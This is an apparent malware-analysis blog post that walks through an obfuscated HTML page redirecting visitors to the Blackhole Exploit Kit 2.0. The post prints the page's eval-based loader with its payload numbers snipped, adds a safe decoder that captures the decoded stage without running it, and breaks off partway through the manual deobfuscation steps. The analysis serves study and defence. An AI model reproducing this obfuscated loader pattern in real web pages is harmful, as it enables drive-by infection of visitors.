Obfuscated iframe leads to Blackhole Exploit Kit 2.0

It's been a while since I last posted. I've been super busy, but I had some time today. I found this a bit interesting so I thought I would share. I haven't looked at browser-based malware much lately.

Let's get started. I was looking online at Malware Domain List and saw an HTML file that redirected the user to the Blackhole exploit kit, so I figured why not.

I didn't have to get wild and spoof wget in order to get the sample to download.


Here is some of the code. I've snipped some of it because I don't want people reusing it or sending other people there.

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<h1>Please wait a moment. You will be forwarded...</h1><script>try{ebgserb++;}catch(snregrx){try{gnezrg|326}catch(ztbet){m=Math;ev=window[""+"e"+"val"];ff="fromCha";ff+="rCode";n="25&&26&&121&&119[snip]");h=2;s="";if(m)for(i=0;i-605!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}}</script>;
</body>

I found a couple things to be interesting here.

ev=window[""+"e"+"val"];  
ff="fromCha";  
ff+="rCode";  
ev(s)  

The ev variable is set up in a non-traditional way: window[""+"e"+"val"] resolves to window.eval, so the ev(s) call further down is really eval(s).

You also see ff= breaking "fromCharCode" into "fromCha" and "rCode", which should simply be "fromCharCode". fromCharCode converts Unicode numbers into characters.

n is the number set. At the end of n you can see ).split(&&), which splits the string on && to give you 22,26,121,119, etc...
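To see what that loop actually produces without ever running the decoded stage, here is an added example (my code, not from the post or from the kit) that re-implements the s+=String[ff](n[i]-(020+i%h)) arithmetic and swaps ev for a function that records the string instead of executing it. The real numbers are snipped, so the encoded array below is constructed from a harmless string; encodeForDemo exists only to build that test data.

```javascript
// Added example: decode the sample's number set without eval.
// Encoding direction, used only to construct demo data: each char code is
// stored as (code + 16 + i % h) and the values are joined with "&&".
function encodeForDemo(plain, h) {
  const nums = [];
  for (let i = 0; i < plain.length; i++) {
    nums.push(plain.charCodeAt(i) + (16 + (i % h)));
  }
  return nums.join("&&");
}

// Mirrors the sample's loop: n = "...".split("&&") and
// s += String.fromCharCode(n[i] - (020 + i % h)).
// 020 is an octal literal (16 == 0x10), which is why the if(020==0x10)
// guard before ev(s) always passes. The sample hard-codes 605 iterations;
// here the length comes from the array. Returns s instead of eval'ing it.
function decodeStage(encoded, h) {
  const n = encoded.split("&&");
  let s = "";
  for (let i = 0; i < n.length; i++) {
    // n[i] is a string; subtraction coerces it to a number, as in the sample.
    s += String.fromCharCode(n[i] - (16 + (i % h)));
  }
  return s;
}

// Stand-in for ev = window["eval"]: capture the code, never execute it.
function captureInsteadOfEval() {
  const captured = [];
  const ev = (code) => { captured.push(code); };
  return { ev, captured };
}

// Constructed, harmless stand-in for the snipped second stage.
const DEMO_PAYLOAD = 'document.write("<h1>decoded stage</h1>");';
const DEMO_ENCODED = encodeForDemo(DEMO_PAYLOAD, 2);

// Same steps the post walks through by hand: decode, then "run" via ev.
function runDemo() {
  const { ev, captured } = captureInsteadOfEval();
  const s = decodeStage(DEMO_ENCODED, 2);
  ev(s);            // the sample would eval here; we only record it
  return captured[0];
}
```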

So now we get the idea that something might be up here. Let's take a look at it.


Let's modify some code. First I want to format it correctly so I can see it a bit better. I had my Windows machine running in my lab, so I copied/pasted the messy code into Malzilla's decoder tab and hit "Format Code".


Then I copy/pasted it back into notepad on REMnux. Now let's manually change some things.

First I am going to modify the ev variable from:

ev=window[""+"e"+"val"]; to ev=eval;

Then I am going to change

ff="fromCha"; and ff+="rCode"; to ff="fromCharCode";

We also need to make sure the ev(s); statement is on its own line.

I'm also going to add debugger; under the first